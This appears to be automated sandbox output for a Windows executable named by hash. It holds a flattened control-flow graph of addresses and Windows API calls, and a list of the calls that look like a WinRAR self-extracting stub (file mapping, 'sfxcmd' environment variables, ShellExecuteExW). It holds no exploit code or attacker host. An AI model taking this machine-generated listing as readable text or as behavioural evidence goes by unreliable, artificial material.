54 API calls 23034->23047 23207 3cde7c 73 API calls 23035->23207 23042 3d9e44 23036->23042 23038->23031 23044 3da3c2 23039->23044 23040 3da0e3 23129 3c12c2 GetDlgItem ShowWindow 23040->23129 23120 3c94f1 23042->23120 23043 3da4a7 23043->23001 23044->23013 23048 3da3cb DialogBoxParamW 23044->23048 23046 3d9edc 23050 3c3f5b _swprintf 51 API calls 23046->23050 23051 3da082 23047->23051 23048->22949 23048->23013 23049 3da0ed 23052 3cd142 54 API calls 23049->23052 23053 3d9efe CreateFileMappingW 23050->23053 23054 3c3f5b _swprintf 51 API calls 23051->23054 23056 3da0f7 SetDlgItemTextW 23052->23056 23057 3d9f60 GetCommandLineW 23053->23057 23089 3d9fdd __vswprintf_c_l 23053->23089 23058 3da0a0 23054->23058 23130 3c12c2 GetDlgItem ShowWindow 23056->23130 23064 3d9f71 23057->23064 23068 3cd142 54 API calls 23058->23068 23059 3d9e6a 23060 3d9e78 23059->23060 23061 3d9e71 GetLastError 23059->23061 23066 3c9437 72 API calls 23060->23066 23061->23060 23062 3d9fe8 ShellExecuteExW 23084 3da005 23062->23084 23208 3d97e4 SHGetMalloc 23064->23208 23066->23022 23067 3da10b SetDlgItemTextW GetDlgItem 23070 3da13c 23067->23070 23071 3da124 GetWindowLongW SetWindowLongW 23067->23071 23068->22949 23069 3d9f8d 23209 3d97e4 SHGetMalloc 23069->23209 23131 3daa45 23070->23131 23071->23070 23075 3d9f99 23210 3d97e4 SHGetMalloc 23075->23210 23076 3da048 23076->23034 23083 3da05e UnmapViewOfFile CloseHandle 23076->23083 23077 3daa45 91 API calls 23079 3da158 23077->23079 23156 3dbc78 23079->23156 23080 3d9fa5 23211 3cdfde 73 API calls ___scrt_fastfail 23080->23211 23083->23034 23084->23076 23087 3da034 Sleep 23084->23087 23086 3d9fbc MapViewOfFile 23086->23089 23087->23076 23087->23084 23089->23062 23093->22949 23093->22969 23096 3c1349 23095->23096 23097 3c12f0 23095->23097 23235 3cceb0 GetWindowLongW SetWindowLongW 23096->23235 23099 3c1356 23097->23099 23217 3cced7 23097->23217 23099->22939 23099->22940 23099->22968 23102 3c1325 GetDlgItem 23102->23099 23103 3c1335 23102->23103 23103->23099 23104 3c133b SetWindowTextW 23103->23104 23104->23099 23106 3db76a SendMessageW SendMessageW 23105->23106 23107 3db73a 23105->23107 23108 3db7c1 SendMessageW SendMessageW SendMessageW 23106->23108 23109 3db7a2 23106->23109 23110 3db745 ShowWindow SendMessageW SendMessageW 23107->23110 23111 3db7ec SendMessageW 23108->23111 23112 3db80b SendMessageW 23108->23112 23109->23108 23110->23106 23111->23112 23112->22984 23116 3c9cd8 23113->23116 23114 3c9d69 23115 3c9e86 9 API calls 23114->23115 23117 3c9d92 23114->23117 23115->23117 23116->23114 23116->23117 23239 3c9e86 23116->23239 23117->23002 23117->23003 23119->23010 23121 3c94fb 23120->23121 23122 3c9565 CreateFileW 23121->23122 23123 3c9559 23121->23123 23122->23123 23124 3c95b7 23123->23124 23125 3cb275 2 API calls 23123->23125 23124->23059 23126 3c959e 23125->23126 23126->23124 23127 3c95a2 CreateFileW 23126->23127 23127->23124 23128->23040 23129->23049 23130->23067 23132 3daa4f __EH_prolog 23131->23132 23133 3da14a 23132->23133 23134 3d96ec ExpandEnvironmentStringsW 23132->23134 23133->23077 23145 3daa86 _wcsrchr 23134->23145 23136 3d96ec ExpandEnvironmentStringsW 23136->23145 23137 3dad86 SetWindowTextW 23137->23145 23140 3e20de 22 API calls 23140->23145 23142 3dab77 SetFileAttributesW 23144 3dac32 GetFileAttributesW 23142->23144 23153 3dab6a ___scrt_fastfail 23142->23153 23147 3dac40 DeleteFileW 23144->23147 23144->23153 23145->23133 23145->23136 23145->23137 23145->23140 23148 3daf50 GetDlgItem SetWindowTextW SendMessageW 23145->23148 23151 3daf92 SendMessageW 23145->23151 23145->23153 23260 3d0b12 CompareStringW 23145->23260 23261 3d8b8e GetCurrentDirectoryW 23145->23261 23262 3ca1a9 7 API calls 23145->23262 23265 3ca132 FindClose 23145->23265 23266 3d9844 69 API calls new 23145->23266 23147->23153 23148->23145 23150 3c3f5b _swprintf 51 API calls 23152 3dac75 GetFileAttributesW 23150->23152 23151->23145 23152->23153 23154 3dac86 MoveFileW 23152->23154 23153->23142 23153->23144 23153->23145 23153->23150 23263 3cb100 52 API calls 2 library calls 23153->23263 23264 3ca1a9 7 API calls 23153->23264 23154->23153 23155 3dac9e MoveFileExW 23154->23155 23155->23153 23157 3dbc82 __EH_prolog 23156->23157 23267 3cf165 69 API calls 23157->23267 23159 3dbcb3 23268 3c5bb7 69 API calls 23159->23268 23161 3dbcd1 23269 3c7b10 74 API calls 2 library calls 23161->23269 23163 3dbd15 23270 3c7c84 23163->23270 23165 3dbd24 23279 3c7ba0 23165->23279 23169 3db8c9 23168->23169 23170 3d8ac0 6 API calls 23169->23170 23171 3db8ce 23170->23171 23172 3da236 23171->23172 23173 3db8d6 GetWindow 23171->23173 23172->22945 23172->22946 23173->23172 23176 3db8f2 23173->23176 23174 3db8ff GetClassNameW 23780 3d0b12 CompareStringW 23174->23780 23176->23172 23176->23174 23177 3db988 GetWindow 23176->23177 23178 3db927 GetWindowLongW 23176->23178 23177->23172 23177->23176 23178->23177 23179 3db937 SendMessageW 23178->23179 23179->23177 23180 3db94d GetObjectW 23179->23180 23781 3d8b22 GetDC GetDeviceCaps ReleaseDC 23180->23781 23182 3db962 23782 3d8adf GetDC GetDeviceCaps ReleaseDC 23182->23782 23783 3d8cf3 8 API calls ___scrt_fastfail 23182->23783 23185 3db972 SendMessageW DeleteObject 23185->23177 23186->22959 23188 3d900e 23187->23188 23189 3d8fe9 23187->23189 23193 3d9485 23188->23193 23784 3d0b12 CompareStringW 23189->23784 23191 3d8ffc 23191->23188 23192 3d9000 FindWindowExW 23191->23192 23192->23188 23194 3d948f __EH_prolog 23193->23194 23195 3c137e 75 API calls 23194->23195 23196 3d94b1 23195->23196 23785 3c1edd 23196->23785 23199 3d94cb 23202 3c162e 79 API calls 23199->23202 23200 3d94da 23201 3c18f6 127 API calls 23200->23201 23204 3d94fc __vswprintf_c_l new 23201->23204 23203 3d94d6 23202->23203 23203->22989 23203->22990 23205 3c162e 79 API calls 23204->23205 23205->23203 23206->22972 23207->23046 23208->23069 23209->23075 23210->23080 23211->23086 23213->23025 23214->23043 23215->23018 23216->23009 23236 3cc88e 23217->23236 23219 3ccefd GetWindowRect GetClientRect 23220 3ccff2 23219->23220 23224 3ccf57 23219->23224 23221 3cd034 GetSystemMetrics GetWindow 23220->23221 23222 3ccffc GetWindowTextW 23220->23222 23227 3cd054 23221->23227 23223 3cc91f 52 API calls 23222->23223 23225 3cd028 SetWindowTextW 23223->23225 23224->23221 23226 3ccfb8 GetWindowLongW 23224->23226 23225->23221 23230 3ccfe2 GetWindowRect 23226->23230 23228 3c1312 23227->23228 23229 3cd060 GetWindowTextW 23227->23229 23231 3cc91f 52 API calls 23227->23231 23232 3cd11b GetWindow 23227->23232 23233 3cd0a6 GetWindowRect 23227->23233 23228->23099 23228->23102 23229->23227 23230->23220 23234 3cd093 SetWindowTextW 23231->23234 23232->23227 23232->23228 23233->23232 23234->23227 23235->23099 23237 3cc91f 52 API calls 23236->23237 23238 3cc8b6 _wcschr 23237->23238 23238->23219 23240 3c9e93 23239->23240 23241 3c9eb7 23240->23241 23242 3c9eaa CreateDirectoryW 23240->23242 23243 3c9dff 4 API calls 23241->23243 23242->23241 23244 3c9eea 23242->23244 23246 3c9ebd 23243->23246 23248 3c9ef9 23244->23248 23252 3ca0c3 23244->23252 23245 3c9efd GetLastError 23245->23248 23246->23245 23249 3cb275 2 API calls 23246->23249 23248->23116 23250 3c9ed3 23249->23250 23250->23245 23251 3c9ed7 CreateDirectoryW 23250->23251 23251->23244 23251->23245 23253 3dcec0 23252->23253 23254 3ca0d0 SetFileAttributesW 23253->23254 23255 3ca0e6 23254->23255 23256 3ca113 23254->23256 23257 3cb275 2 API calls 23255->23257 23256->23248 23258 3ca0fa 23257->23258 23258->23256 23259 3ca0fe SetFileAttributesW 23258->23259 23259->23256 23260->23145 23261->23145 23262->23145 23263->23153 23264->23153 23265->23145 23266->23145 23267->23159 23268->23161 23269->23163 23271 3c7c8e 23270->23271 23276 3c7cf8 23271->23276 23305 3ca145 23271->23305 23273 3c7da4 23273->23165 23275 3c7d62 23275->23273 23311 3c6d0d 67 API calls 23275->23311 23276->23275 23277 3ca145 8 API calls 23276->23277 23283 3c820b 23276->23283 23277->23276 23280 3c7bae 23279->23280 23281 3c7bb5 23279->23281 23282 3d0e21 79 API calls 23280->23282 23282->23281 23284 3c8215 __EH_prolog 23283->23284 23312 3c137e 23284->23312 23286 3c8230 23320 3c9ba2 23286->23320 23292 3c825f 23440 3c162e 23292->23440 23296 3c835a 23343 3c1e8e 23296->23343 23299 3c8365 23299->23292 23347 3c3a20 23299->23347 23357 3c8409 23299->23357 23301 3ca145 8 API calls 23302 3c825b 23301->23302 23302->23292 23302->23301 23304 3c82fa 23302->23304 23444 3cb6cb CompareStringW 23302->23444 23339 3c83a3 23304->23339 23307 3ca15a 23305->23307 23306 3ca15e 23306->23271 23307->23306 23768 3ca273 23307->23768 23309 3ca16e 23309->23306 23310 3ca173 FindClose 23309->23310 23310->23306 23311->23273 23313 3c1383 __EH_prolog 23312->23313 23446 3cc413 23313->23446 23315 3c13ba 23319 3c1413 ___scrt_fastfail 23315->23319 23452 3dcdae 23315->23452 23318 3cac66 75 API calls 23318->23319 23319->23286 23321 3c9bad 23320->23321 23322 3c8246 23321->23322 23461 3c6e66 67 API calls 23321->23461 23322->23292 23324 3c19b1 23322->23324 23325 3c19bb __EH_prolog 23324->23325 23332 3c19fd 23325->23332 23337 3c19e4 23325->23337 23462 3c135c 23325->23462 23327 3c1b16 23465 3c6d0d 67 API calls 23327->23465 23329 3c3a20 90 API calls 23334 3c1b6d 23329->23334 23330 3c1b26 23330->23329 23330->23337 23331 3c1bb7 23331->23337 23338 3c1bea 23331->23338 23466 3c6d0d 67 API calls 23331->23466 23332->23327 23332->23330 23332->23337 23334->23331 23335 3c3a20 90 API calls 23334->23335 23335->23334 23336 3c3a20 90 API calls 23336->23338 23337->23302 23338->23336 23338->23337 23340 3c83b0 23339->23340 23484 3cffb8 GetSystemTime SystemTimeToFileTime 23340->23484 23342 3c8314 23342->23296 23445 3d06c8 65 API calls 23342->23445 23345 3c1e93 __EH_prolog 23343->23345 23344 3c1ec7 23344->23299 23345->23344 23486 3c18f6 23345->23486 23348 3c3a2c 23347->23348 23349 3c3a30 23347->23349 23348->23299 23350 3c3a5d 23349->23350 23351 3c3a4f 23349->23351 23704 3c276c 90 API calls 3 library calls 23350->23704 23352 3c3a8f 23351->23352 23703 3c3203 78 API calls 3 library calls 23351->23703 23352->23299 23355 3c3a5b 23355->23352 23705 3c1fd2 67 API calls 23355->23705 23358 3c8413 __EH_prolog 23357->23358 23359 3c844f 23358->23359 23364 3c8453 23358->23364 23734 3d77e7 93 API calls 23358->23734 23360 3c8478 23359->23360 23359->23364 23367 3c84ff 23359->23367 23361 3c849a 23360->23361 23360->23364 23735 3c7a2f 151 API calls 23360->23735 23361->23364 23736 3d77e7 93 API calls 23361->23736 23364->23299 23367->23364 23706 3c5d98 23367->23706 23368 3c858c 23368->23364 23714 3c80f8 23368->23714 23371 3c86e9 23372 3ca145 8 API calls 23371->23372 23375 3c874d 23371->23375 23372->23375 23374 3cc57d 73 API calls 23379 3c87a7 _memcmp 23374->23379 23718 3c7c11 23375->23718 23376 3c88d1 23377 3c89a0 23376->23377 23383 3c891f 23376->23383 23382 3c89fb 23377->23382 23393 3c89ab 23377->23393 23378 3c88ca 23739 3c6d0d 67 API calls 23378->23739 23379->23364 23379->23374 23379->23376 23379->23378 23737 3c80a6 75 API calls 23379->23737 23738 3c6d0d 67 API calls 23379->23738 23392 3c898f 23382->23392 23742 3c7f88 89 API calls 23382->23742 23386 3c9dff 4 API calls 23383->23386 23383->23392 23384 3c8fb5 23388 3c9437 72 API calls 23384->23388 23385 3c89f9 23387 3c9437 72 API calls 23385->23387 23390 3c8956 23386->23390 23387->23364 23388->23364 23390->23392 23740 3c9161 89 API calls 23390->23740 23391 3c8a64 23391->23384 23395 3c971a GetFileType 23391->23395 23404 3c8acd 23391->23404 23392->23385 23392->23391 23393->23385 23741 3c7dc4 93 API calls __except_handler4 23393->23741 23394 3ca6a9 8 API calls 23397 3c8b1c 23394->23397 23399 3c8aa5 23395->23399 23400 3ca6a9 8 API calls 23397->23400 23399->23404 23743 3c1f18 67 API calls 23399->23743 23405 3c8b32 23400->23405 23402 3c8abb 23744 3c6f67 68 API calls 23402->23744 23404->23394 23408 3c8bd5 23405->23408 23724 3c9869 23405->23724 23406 3c8c1e 23409 3c8c8e 23406->23409 23411 3c8c2e 23406->23411 23407 3c8d22 23412 3c8d48 23407->23412 23413 3c8d34 23407->23413 23430 3c8c4e 23407->23430 23408->23406 23408->23407 23410 3c80f8 CharUpperW 23409->23410 23415 3c8ca9 23410->23415 23416 3c8c72 23411->23416 23421 3c8c3c 23411->23421 23418 3d1fa9 68 API calls 23412->23418 23417 3c90d0 120 API calls 23413->23417 23423 3c8cd9 23415->23423 23424 3c8cd2 23415->23424 23415->23430 23416->23430 23746 3c77d4 101 API calls 23416->23746 23417->23430 23419 3c8d61 23418->23419 23422 3d1c40 120 API calls 23419->23422 23745 3c1f18 67 API calls 23421->23745 23422->23430 23748 3c900e 85 API calls __EH_prolog 23423->23748 23747 3c7586 77 API calls __except_handler4 23424->23747 23428 3c8e6c 23428->23384 23429 3c8edb 23428->23429 23750 3c9b6a SetEndOfFile 23428->23750 23729 3c9a12 23429->23729 23430->23428 23749 3c1f18 67 API calls 23430->23749 23434 3c8f35 23435 3c94a3 68 API calls 23434->23435 23436 3c8f40 23435->23436 23436->23384 23437 3ca0c3 4 API calls 23436->23437 23438 3c8f9f 23437->23438 23438->23384 23751 3c1f18 67 API calls 23438->23751 23441 3c1640 23440->23441 23767 3cc4b6 79 API calls 23441->23767 23444->23302 23445->23296 23447 3cc41d __EH_prolog 23446->23447 23448 3dcdae new 8 API calls 23447->23448 23450 3cc460 23448->23450 23449 3dcdae new 8 API calls 23451 3cc484 23449->23451 23450->23449 23451->23315 23454 3dcdb3 new 23452->23454 23453 3c1400 23453->23318 23453->23319 23454->23453 23458 3e46ca 7 API calls 2 library calls 23454->23458 23459 3dd83a RaiseException __CxxThrowException@8 new 23454->23459 23460 3dd81d RaiseException Concurrency::cancel_current_task __CxxThrowException@8 23454->23460 23458->23454 23461->23322 23467 3c1705 23462->23467 23464 3c1378 23464->23332 23465->23337 23466->23338 23468 3c171b 23467->23468 23479 3c1773 __vswprintf_c_l 23467->23479 23469 3c1744 23468->23469 23480 3c6dd3 67 API calls __vswprintf_c_l 23468->23480 23470 3c179a 23469->23470 23471 3c1760 new 23469->23471 23473 3e20de 22 API calls 23470->23473 23471->23479 23482 3c6e0b 68 API calls 23471->23482 23475 3c17a1 23473->23475 23474 3c173a 23481 3c6e0b 68 API calls 23474->23481 23475->23479 23483 3c6e0b 68 API calls 23475->23483 23479->23464 23480->23474 23481->23469 23482->23479 23483->23479 23485 3cffe8 __vswprintf_c_l 23484->23485 23485->23342 23487 3c18fb __EH_prolog 23486->23487 23488 3c1934 23487->23488 23489 3c1964 23487->23489 23493 3c190f 23487->23493 23490 3c3a20 90 API calls 23488->23490 23495 3c3e69 23489->23495 23490->23493 23493->23344 23499 3c3e72 23495->23499 23496 3c3a20 90 API calls 23496->23499 23497 3c1980 23497->23493 23500 3c1da1 23497->23500 23499->23496 23499->23497 23512 3cf8f2 23499->23512 23501 3c1dab __EH_prolog 23500->23501 23520 3c3aa3 23501->23520 23503 3c1dd4 23504 3c1e5b 23503->23504 23505 3c1705 69 API calls 23503->23505 23504->23493 23506 3c1deb 23505->23506 23550 3c187c 69 API calls 23506->23550 23508 3c1e03 23510 3c1e0f 23508->23510 23551 3d06e9 MultiByteToWideChar 23508->23551 23552 3c187c 69 API calls 23510->23552 23513 3cf8f9 23512->23513 23514 3cf914 23513->23514 23518 3c6dce RaiseException __CxxThrowException@8 23513->23518 23516 3cf925 SetThreadExecutionState 23514->23516 23519 3c6dce RaiseException __CxxThrowException@8 23514->23519 23516->23499 23518->23514 23519->23516 23521 3c3aad __EH_prolog 23520->23521 23522 3c3adf 23521->23522 23523 3c3ac3 23521->23523 23525 3c3d1f 23522->23525 23528 3c3b0b 23522->23528 23589 3c6d0d 67 API calls 23523->23589 23608 3c6d0d 67 API calls 23525->23608 23527 3c3ace 23527->23503 23528->23527 23553 3d0be0 23528->23553 23530 3c3b43 23557 3d1fa9 23530->23557 23532 3c3b8c 23534 3c3c17 23532->23534 23549 3c3b83 23532->23549 23592 3cc57d 23532->23592 23533 3c3b88 23533->23532 23591 3c1fb8 69 API calls 23533->23591 23570 3ca6a9 23534->23570 23536 3c3b5a 23536->23532 23536->23533 23537 3c3b78 23536->23537 23590 3c6d0d 67 API calls 23537->23590 23538 3c3c2a 23543 3c3c9b 23538->23543 23544 3c3ca5 23538->23544 23574 3c90d0 23543->23574 23598 3d1c40 23544->23598 23547 3c3ca3 23547->23549 23607 3c1f18 67 API calls 23547->23607 23585 3d0e21 23549->23585 23550->23508 23551->23510 23552->23504 23554 3d0bea __EH_prolog 23553->23554 23609 3cfb02 23554->23609 23556 3d0cea 23556->23530 23558 3d1fb8 23557->23558 23560 3d1fc2 23557->23560 23628 3c6e0b 68 API calls 23558->23628 23561 3d2002 23560->23561 23564 3d2007 new 23560->23564 23569 3d2060 ___scrt_fastfail 23560->23569 23630 3e00ca RaiseException 23561->23630 23563 3d2117 23631 3e00ca RaiseException 23563->23631 23564->23563 23566 3d203c 23564->23566 23564->23569 23629 3d1eca 68 API calls 3 library calls 23566->23629 23567 3d213a 23569->23536 23571 3ca6b6 23570->23571 23573 3ca6c0 23570->23573 23572 3dcdae new 8 API calls 23571->23572 23572->23573 23573->23538 23575 3c90da __EH_prolog 23574->23575 23632 3c7c6b 23575->23632 23578 3c135c 69 API calls 23579 3c90ec 23578->23579 23635 3cc658 23579->23635 23581 3c9146 23581->23547 23583 3cc658 115 API calls 23584 3c90fe 23583->23584 23584->23581 23584->23583 23644 3cc810 91 API calls __vswprintf_c_l 23584->23644 23586 3d0e43 23585->23586 23651 3cfc30 23586->23651 23588 3d0e5c 23588->23527 23589->23527 23590->23549 23591->23532 23593 3cc59e 23592->23593 23594 3cc5b0 23592->23594 23667 3c6195 73 API calls 23593->23667 23668 3c6195 73 API calls 23594->23668 23597 3cc5a8 23597->23534 23599 3d1c49 23598->23599 23600 3d1c72 23598->23600 23601 3d1c66 23599->23601 23602 3d1c68 23599->23602 23604 3d1c5e 23599->23604 23600->23601 23683 3d421d 120 API calls 2 library calls 23600->23683 23601->23547 23682 3d4f35 115 API calls 23602->23682 23669 3d5984 23604->23669 23607->23549 23608->23527 23625 3dcdf0 23609->23625 23611 3cfb0c EnterCriticalSection 23612 3cfb30 23611->23612 23619 3cfb4e 23611->23619 23613 3dcdae new 8 API calls 23612->23613 23618 3cfb3a 23613->23618 23614 3cfb95 LeaveCriticalSection 23616 3cfba1 23614->23616 23615 3cfb66 23617 3dcdae new 8 API calls 23615->23617 23616->23556 23620 3cfb70 23617->23620 23618->23619 23626 3cf930 71 API calls 23618->23626 23619->23614 23619->23615 23622 3cfb8a LeaveCriticalSection 23620->23622 23627 3cf930 71 API calls 23620->23627 23622->23616 23624 3cfb88 23624->23622 23625->23611 23626->23619 23627->23624 23628->23560 23629->23569 23630->23563 23631->23567 23633 3ca8e0 GetVersionExW 23632->23633 23634 3c7c70 23633->23634 23634->23578 23640 3cc66d __vswprintf_c_l 23635->23640 23636 3cc7b7 23637 3cc7df 23636->23637 23645 3cc5f7 23636->23645 23639 3cf8f2 2 API calls 23637->23639 23642 3cc7ae 23639->23642 23640->23636 23640->23642 23649 3ca791 85 API calls 23640->23649 23650 3d77e7 93 API calls 23640->23650 23642->23584 23644->23584 23646 3cc600 23645->23646 23648 3cc651 23645->23648 23647 3d0680 PeekMessageW GetMessageW TranslateMessage DispatchMessageW SendDlgItemMessageW 23646->23647 23646->23648 23647->23648 23648->23637 23649->23640 23650->23640 23652 3cfc39 EnterCriticalSection 23651->23652 23653 3cfca2 23651->23653 23657 3cfc57 23652->23657 23659 3cfc75 23652->23659 23653->23588 23654 3cf9d1 77 API calls 23656 3cfc8f 23654->23656 23655 3cfc98 LeaveCriticalSection 23655->23653 23656->23655 23657->23659 23660 3cf9d1 23657->23660 23659->23654 23659->23655 23661 3cfdc9 72 API calls 23660->23661 23662 3cf9f3 ReleaseSemaphore 23661->23662 23663 3cfa31 DeleteCriticalSection CloseHandle CloseHandle 23662->23663 23664 3cfa13 23662->23664 23663->23659 23665 3cfac7 70 API calls 23664->23665 23666 3cfa1d CloseHandle 23665->23666 23666->23663 23666->23664 23667->23597 23668->23597 23684 3d21e6 23669->23684 23671 3cc658 115 API calls 23675 3d5995 ___BuildCatchObject __vswprintf_c_l 23671->23675 23672 3d5d67 23702 3d3ef1 92 API calls __vswprintf_c_l 23672->23702 23674 3d5d77 __vswprintf_c_l 23674->23601 23675->23671 23675->23672 23688 3cfa67 23675->23688 23694 3d2b3a 115 API calls 23675->23694 23695 3d5db9 115 API calls 23675->23695 23696 3cfdc9 23675->23696 23700 3d2593 92 API calls __vswprintf_c_l 23675->23700 23701 3d63f2 120 API calls __vswprintf_c_l 23675->23701 23682->23601 23683->23601 23686 3d21f0 __EH_prolog ___scrt_fastfail new 23684->23686 23685 3d22db 23685->23675 23686->23685 23687 3c6e0b 68 API calls 23686->23687 23687->23686 23689 3cfa78 23688->23689 23690 3cfa73 23688->23690 23692 3cfa91 23689->23692 23693 3cfdc9 72 API calls 23689->23693 23691 3cfbb1 77 API calls 23690->23691 23691->23689 23692->23675 23693->23692 23694->23675 23695->23675 23697 3cfe0e 23696->23697 23698 3cfde3 ResetEvent ReleaseSemaphore 23696->23698 23697->23675 23699 3cfac7 70 API calls 23698->23699 23699->23697 23700->23675 23701->23675 23702->23674 23703->23355 23704->23355 23705->23352 23707 3c5da6 23706->23707 23752 3c5cc5 23707->23752 23709 3c5e11 23709->23368 23710 3c5dd9 23710->23709 23712 3c5e1a 23710->23712 23757 3ca950 CharUpperW CompareStringW CompareStringW 23710->23757 23712->23709 23758 3cf0e1 CompareStringW 23712->23758 23716 3c8116 23714->23716 23715 3c81b7 CharUpperW 23717 3c81ca 23715->23717 23716->23715 23717->23371 23719 3c7c20 23718->23719 23720 3c7c60 23719->23720 23764 3c6f49 67 API calls 23719->23764 23720->23379 23722 3c7c58 23765 3c6d0d 67 API calls 23722->23765 23725 3c9897 2 API calls 23724->23725 23726 3c987d 23725->23726 23727 3c9888 23726->23727 23766 3c9b6a SetEndOfFile 23726->23766 23727->23408 23730 3c9a23 23729->23730 23733 3c9a32 23729->23733 23731 3c9a29 FlushFileBuffers 23730->23731 23730->23733 23731->23733 23732 3c9aab SetFileTime 23732->23434 23733->23732 23734->23359 23735->23361 23736->23364 23737->23379 23738->23379 23739->23376 23740->23392 23741->23385 23742->23392 23743->23402 23744->23404 23745->23430 23746->23430 23747->23430 23748->23430 23749->23428 23750->23429 23751->23384 23759 3c5bc2 23752->23759 23754 3c5ce6 23754->23710 23756 3c5bc2 3 API calls 23756->23754 23757->23710 23758->23709 23760 3c5bcc 23759->23760 23762 3c5cb4 23760->23762 23763 3ca950 CharUpperW CompareStringW CompareStringW 23760->23763 23762->23754 23762->23756 23763->23760 23764->23722 23765->23720 23766->23727 23769 3ca27d 23768->23769 23770 3ca30d FindNextFileW 23769->23770 23771 3ca29b FindFirstFileW 23769->23771 23772 3ca32c 23770->23772 23773 3ca318 GetLastError 23770->23773 23774 3ca2b4 23771->23774 23779 3ca2f1 23771->23779 23772->23779 23773->23772 23775 3cb275 2 API calls 23774->23775 23776 3ca2cd 23775->23776 23777 3ca2e6 GetLastError 23776->23777 23778 3ca2d1 FindFirstFileW 23776->23778 23777->23779 23778->23777 23778->23779 23779->23309 23780->23176 23781->23182 23782->23182 23783->23185 23784->23191 23786 3c9ba2 67 API calls 23785->23786 23787 3c1ee9 23786->23787 23788 3c1eed 23787->23788 23789 3c19b1 90 API calls 23787->23789 23788->23199 23788->23200 23790 3c1efa 23789->23790 23790->23788 23792 3c6d0d 67 API calls 23790->23792 23792->23788 23926 3dd74a 28 API calls 2 library calls 23901 3d9646 92 API calls 23927 3e1b40 5 API calls 2 library calls 23929 3d4fb5 120 API calls __vswprintf_c_l 23931 3de7b0 51 API calls 2 library calls 23906 3e8aaa GetProcessHeap 22184 3c10a9 22189 3c5b35 22184->22189 22190 3c5b3f __EH_prolog 22189->22190 22196 3cac66 22190->22196 22192 3c5b4b 22202 3c5d2a GetCurrentProcess GetProcessAffinityMask 22192->22202 22197 3cac70 __EH_prolog 22196->22197 22203 3cddc2 73 API calls 22197->22203 22199 3cac82 22204 3cad7e 22199->22204 22203->22199 22205 3cad90 ___scrt_fastfail 22204->22205 22208 3cfce6 22205->22208 22211 3cfca6 GetCurrentProcess GetProcessAffinityMask 22208->22211 22212 3cacf8 22211->22212 22212->22192 23933 3daa99 91 API calls 3 library calls 23909 3e0e9d 48 API calls 23881 3d899a GdipCloneImage GdipAlloc 23910 3c7a9b GetCurrentProcess GetLastError CloseHandle 22298 3e7695 22299 3e76a0 22298->22299 22301 3e76c9 22299->22301 22302 3e76c5 22299->22302 22304 3e79a7 22299->22304 22311 3e76ed DeleteCriticalSection 22301->22311 22305 3e7735 pre_c_initialization 5 API calls 22304->22305 22306 3e79ce 22305->22306 22307 3e79ec InitializeCriticalSectionAndSpinCount 22306->22307 22308 3e79d7 22306->22308 22307->22308 22309 3dd783 CatchGuardHandler 5 API calls 22308->22309 22310 3e7a03 22309->22310 22310->22299 22311->22302 23882 3d9584 GetDlgItem EnableWindow ShowWindow SendMessageW 23853 3c9481 72 API calls 23812 3dc782 23814 3dc730 23812->23814 23813 3dcabc ___delayLoadHelper2@8 19 API calls 23813->23814 23814->23813 23815 3c1383 75 API calls 3 library calls 23883 3dd5ff 27 API calls pre_c_initialization 23854 3e88fb GetCommandLineA GetCommandLineW 21984 3c18fb 127 API calls __EH_prolog 23939 3e7be8 27 API calls 3 library calls 23940 3dc3ea 19 API calls ___delayLoadHelper2@8 23857 3ec0e4 51 API calls 23915 3c16e3 79 API calls 23860 3daa99 96 API calls 4 library calls 23942 3e4bda 52 API calls 3 library calls 23885 3cddda FreeLibrary 23862 3d7cd5 GetClientRect 23917 3e4ed4 55 API calls _free 22923 3dc0d0 22924 3dc0dd 22923->22924 22925 3cd142 54 API calls 22924->22925 22926 3dc0f1 22925->22926 22927 3c3f5b _swprintf 51 API calls 22926->22927 22928 3dc103 SetDlgItemTextW 22927->22928 22931 3d991e PeekMessageW 22928->22931 22932 3d9939 GetMessageW TranslateMessage DispatchMessageW 22931->22932 22933 3d995a 22931->22933 22932->22933 23918 3daa99 101 API calls 4 library calls 23793 3c9bc8 23794 3c9bdb 23793->23794 23795 3c9bd4 23793->23795 23796 3c9be1 GetStdHandle 23794->23796 23803 3c9bec 23794->23803 23796->23803 23797 3c9c41 WriteFile 23797->23803 23798 3c9c11 WriteFile 23799 3c9c0c 23798->23799 23798->23803 23799->23798 23799->23803 23801 3c9cb4 23805 3c6f67 68 API calls 23801->23805 23803->23795 23803->23797 23803->23798 23803->23799 23803->23801 23804 3c6d5a 56 API calls 23803->23804 23804->23803 23805->23795 23944 3e6fcb 71 API calls _free 23919 3d86cb 22 API calls 23886 3e71c0 31 API calls 2 library calls 23945 3d63c3 115 API calls

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 003CF353: GetModuleHandleW.KERNEL32 ref: 003CF36B
                                                                                            • Part of subcall function 003CF353: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 003CF383
                                                                                            • Part of subcall function 003CF353: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 003CF3A6
                                                                                            • Part of subcall function 003D8B8E: GetCurrentDirectoryW.KERNEL32(?,?), ref: 003D8B96
                                                                                            • Part of subcall function 003D9036: OleInitialize.OLE32(00000000), ref: 003D904F
                                                                                            • Part of subcall function 003D9036: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 003D9086
                                                                                            • Part of subcall function 003D9036: SHGetMalloc.SHELL32(004020E8), ref: 003D9090
                                                                                            • Part of subcall function 003D0722: GetCPInfo.KERNEL32(00000000,?), ref: 003D0733
                                                                                            • Part of subcall function 003D0722: IsDBCSLeadByte.KERNEL32(00000000), ref: 003D0747
                                                                                          • GetCommandLineW.KERNEL32 ref: 003DC179
                                                                                          • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 003DC1A0
                                                                                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 003DC1B1
                                                                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 003DC1EB
                                                                                            • Part of subcall function 003DBE0A: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 003DBE20
                                                                                            • Part of subcall function 003DBE0A: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 003DBE5C
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 003DC1F4
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe,00000800), ref: 003DC20F
                                                                                          • SetEnvironmentVariableW.KERNEL32(sfxname,C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe), ref: 003DC221
